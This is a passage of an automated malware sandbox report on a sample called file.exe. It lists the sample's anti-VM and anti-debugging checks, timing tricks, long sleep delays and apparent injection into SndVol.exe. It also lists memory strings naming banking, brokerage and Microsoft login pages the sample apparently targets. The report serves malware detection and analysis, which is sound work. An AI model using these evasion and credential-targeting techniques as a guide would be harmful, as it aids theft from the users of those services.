                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7448, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\SndVol.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 3050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 5050000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 7C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 8C40000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: A830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: B830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeMemory allocated: C830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E rdtsc 4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4385Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1243Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeWindow / User API: threadDelayed 9841Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SndVol.exeAPI coverage: 2.7 %
                Source: C:\Users\user\Desktop\file.exe TID: 7472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060Thread sleep count: 132 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060Thread sleep time: -264000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060Thread sleep count: 9841 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exe TID: 2060Thread sleep time: -19682000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616Thread sleep count: 39 > 30Jump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616Thread sleep time: -58500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\EMbUihoSCzijiubZYucHVAvDfGtxLbHvhLgqatSPVJItmoAhssImBiyMYuhBQlKJNVqBreBp\CQcxGFiNQWzmXwbg1.exe TID: 6616Thread sleep time: -38000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SndVol.exeCode function: 9_2_030AC7E0 FindFirstFileW,FindNextFileW,FindClose,9_2_030AC7E0
                Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 31mF3HIk-.9.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: East & CentralVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: 31mF3HIk-.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: 31mF3HIk-.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: 31mF3HIk-.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: 31mF3HIk-.9.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: file.exe, 00000000.00000002.1326953013.0000000001319000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: firefox.exe, 0000000C.00000002.1972261321.0000026D56E9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllSSM
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: 31mF3HIk-.9.drBinary or memory string: global block list test formVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: 31mF3HIk-.9.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: 31mF3HIk-.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: SndVol.exe, 00000009.00000002.3761170910.00000000032CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 31mF3HIk-.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: 31mF3HIk-.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,1169650
                Source: file.exe, 00000000.00000002.1326953013.0000000001319000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: 31mF3HIk-.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: 31mF3HIk-.9.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: 31mF3HIk-.9.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: 31mF3HIk-.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: 31mF3HIk-.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: SndVol.exe, 00000009.00000002.3771875465.00000000084D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,1
                Source: CQcxGFiNQWzmXwbg1.exe, 0000000A.00000002.3767462834.0000000000E19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                Source: 31mF3HIk-.9.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: 31mF3HIk-.9.drBinary or memory string: discord.comVMware20,11696503903f
                Source: 31mF3HIk-.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\SndVol.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0175096E rdtsc 4_2_0175096E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_00417D93 LdrLoadDll,4_2_00417D93
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8158 mov eax, dword ptr fs:[00000030h]4_2_017A8158
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716154 mov eax, dword ptr fs:[00000030h]4_2_01716154
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01716154 mov eax, dword ptr fs:[00000030h]4_2_01716154
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170C156 mov eax, dword ptr fs:[00000030h]4_2_0170C156
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]4_2_017A4144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]4_2_017A4144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4144 mov ecx, dword ptr fs:[00000030h]4_2_017A4144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]4_2_017A4144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4144 mov eax, dword ptr fs:[00000030h]4_2_017A4144
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01740124 mov eax, dword ptr fs:[00000030h]4_2_01740124
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA118 mov ecx, dword ptr fs:[00000030h]4_2_017BA118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA118 mov eax, dword ptr fs:[00000030h]4_2_017BA118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA118 mov eax, dword ptr fs:[00000030h]4_2_017BA118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BA118 mov eax, dword ptr fs:[00000030h]4_2_017BA118
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D0115 mov eax, dword ptr fs:[00000030h]4_2_017D0115
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov eax, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017BE10E mov ecx, dword ptr fs:[00000030h]4_2_017BE10E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017401F8 mov eax, dword ptr fs:[00000030h]4_2_017401F8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E61E5 mov eax, dword ptr fs:[00000030h]4_2_017E61E5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]4_2_0178E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]4_2_0178E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0178E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]4_2_0178E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0178E1D0 mov eax, dword ptr fs:[00000030h]4_2_0178E1D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D61C3 mov eax, dword ptr fs:[00000030h]4_2_017D61C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D61C3 mov eax, dword ptr fs:[00000030h]4_2_017D61C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]4_2_0179019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]4_2_0179019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]4_2_0179019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179019F mov eax, dword ptr fs:[00000030h]4_2_0179019F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170A197 mov eax, dword ptr fs:[00000030h]4_2_0170A197
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170A197 mov eax, dword ptr fs:[00000030h]4_2_0170A197
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170A197 mov eax, dword ptr fs:[00000030h]4_2_0170A197
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01750185 mov eax, dword ptr fs:[00000030h]4_2_01750185
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CC188 mov eax, dword ptr fs:[00000030h]4_2_017CC188
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CC188 mov eax, dword ptr fs:[00000030h]4_2_017CC188
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B4180 mov eax, dword ptr fs:[00000030h]4_2_017B4180
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B4180 mov eax, dword ptr fs:[00000030h]4_2_017B4180
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0173C073 mov eax, dword ptr fs:[00000030h]4_2_0173C073
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01712050 mov eax, dword ptr fs:[00000030h]4_2_01712050
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01796050 mov eax, dword ptr fs:[00000030h]4_2_01796050
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6030 mov eax, dword ptr fs:[00000030h]4_2_017A6030
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170A020 mov eax, dword ptr fs:[00000030h]4_2_0170A020
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170C020 mov eax, dword ptr fs:[00000030h]4_2_0170C020
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]4_2_0172E016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]4_2_0172E016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]4_2_0172E016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0172E016 mov eax, dword ptr fs:[00000030h]4_2_0172E016
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01794000 mov ecx, dword ptr fs:[00000030h]4_2_01794000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B2000 mov eax, dword ptr fs:[00000030h]4_2_017B2000
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170C0F0 mov eax, dword ptr fs:[00000030h]4_2_0170C0F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017520F0 mov ecx, dword ptr fs:[00000030h]4_2_017520F0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0170A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0170A0E3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017180E9 mov eax, dword ptr fs:[00000030h]4_2_017180E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017960E0 mov eax, dword ptr fs:[00000030h]4_2_017960E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017920DE mov eax, dword ptr fs:[00000030h]4_2_017920DE
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D60B8 mov eax, dword ptr fs:[00000030h]4_2_017D60B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D60B8 mov ecx, dword ptr fs:[00000030h]4_2_017D60B8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A80A8 mov eax, dword ptr fs:[00000030h]4_2_017A80A8
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0171208A mov eax, dword ptr fs:[00000030h]4_2_0171208A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B437C mov eax, dword ptr fs:[00000030h]4_2_017B437C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]4_2_0179035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]4_2_0179035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179035C mov eax, dword ptr fs:[00000030h]4_2_0179035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179035C mov ecx, dword ptr fs:[00000030h]4_2_0179035C
